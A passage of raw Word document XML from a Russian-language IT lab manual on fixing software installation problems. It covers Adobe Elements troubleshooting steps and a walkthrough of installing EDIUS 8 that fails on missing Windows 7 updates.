        </w:r>
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>«</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Vista</w:t>
        </w:r>
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>»</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="main-pars_header_18"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10. Установите стандартный размер файла подкачки виртуальной памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="main-pars_header_19"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 10 или 8. </w:t>
      </w:r>
      <w:bookmarkStart w:id="75" w:name="main-pars_text_17"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для Windows 10 и 8 см. раздел </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Изменение размера виртуальной памяти</w:t>
        </w:r>
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>»</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и используйте следующие настройки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Исходный размер: введите значение, в полтора раза превышающее объем установленной на компьютере оперативной памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Максимальный размер: введите значение в 2 раза больше значения Исходного размера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="main-pars_header_20"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 7 или Vista. </w:t>
      </w:r>
      <w:bookmarkStart w:id="77" w:name="main-pars_text_18"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для OC Windows 7 или Vista см. раздел </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Установка размера по умолчанию для файла подкачки виртуальной памяти</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="main-pars_header_21"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Исправление и дефрагментация жестких дисков. </w:t>
      </w:r>
      <w:bookmarkStart w:id="79" w:name="main-pars_text_19"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оптимизируйте жесткие диски путем исправления и дефрагментации: </w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 10 и Windows 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 7 и Vista</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="main-pars_header_22"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12. Проверьте систему на наличие вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="main-pars_text_20"/>
      <w:bookmarkEnd w:id="81"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>При помощи современного антивирусного программного обеспечения (например, Symantec Norton AntiVirus или McAfee VirusScan) проверьте систему на наличие вирусов. Заражение вирусом может повредить программное обеспечение и вызвать ошибки установки. Более подробные сведения см. в документации к антивирусному ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="main-pars_header_23"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительный поиск неисправностей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="main-pars_header_24"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Войдите, используя встроенную учетную запись администратора. </w:t>
      </w:r>
      <w:bookmarkStart w:id="84" w:name="main-pars_text_21"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">См. подробную информацию в разделе </w:t>
      </w:r>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>«</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Вход с помощью встроенной учетной записи администратора</w:t>
        </w:r>
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>»</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="main-pars_header_25"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Свяжитесь со службой технической поддержки Adobe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="main-pars_text_22"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если ни одно из описанных выше действий не устранило ошибку, которая возникает в процессе установки Photoshop Elements или Premiere Elements, свяжитесь со службой технической поддержки Adobe. Параметры поддержки приведены в </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Support Center</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc507788512"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Выявление и устранение проблем установки </w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программного обеспечения</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для обработки видео. Составление инструкций для пользователя</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Установить программу EDIUS 8 для обработки видео</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Скачать с официального FTP дистрибутив: EDIUS_DL_Setup-8.3.0.320.exe. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Запускаем дистрибутив: Открыть файл – предупреждение системы безопасности. Запустить этот файл? Нажимаем на кнопку: Запустить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2164918" cy="1483200"/>
            <wp:effectExtent l="19050" t="0" r="6782" b="0"/>
            <wp:docPr id="158" name="Рисунок 192"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2174812" cy="1489979"/>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>окне</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDIUS 8 Setup, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ставим</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>галку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>перед</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>пунктом</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: I agree to the license terms and conditions. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>нажимаем</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>кнопку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Install.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1773750" cy="1131745"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="159" name="Рисунок 193"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1780329" cy="1135943"/>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4. Запустится процесс установки программы EDIUS 8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1873204" cy="1195200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="160" name="Рисунок 194"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1877423" cy="1197892"/>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5. Который прервется на процессе проверки секретных обновлений для Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1873204" cy="1195200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="161" name="Рисунок 195"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1873597" cy="1195451"/>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6.Появится окно EDIUS Setup, где будет сообщено, что надо установить два секретных обновления: Windows6.1-KB3033929-x64 и Windows6.1-KB3035131-x64. Нажимаем на кнопку: Да.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1861000" cy="1075489"/>
            <wp:effectExtent l="19050" t="0" r="5900" b="0"/>
            <wp:docPr id="162" name="Рисунок 196" descr="Grass Valley Ediu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Grass Valley Edius 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1861873" cy="1075993"/>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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">7.EDIUS 8 Setup. Setup Failed. 0X80004004 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Операция</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>прервана</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажимаем на кнопку: Close.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1860150" cy="1186872"/>
            <wp:effectExtent l="19050" t="0" r="6750" b="0"/>
            <wp:docPr id="163" name="Рисунок 197" descr="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Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1863330" cy="1188901"/>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8.На странице EDIUS Frequently Asked Questions (FAQ) есть две активных ссылки для скачивания секретных обновлений для Windows 7 SP1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2287367" cy="2239200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="164" name="Рисунок 198" descr="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Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
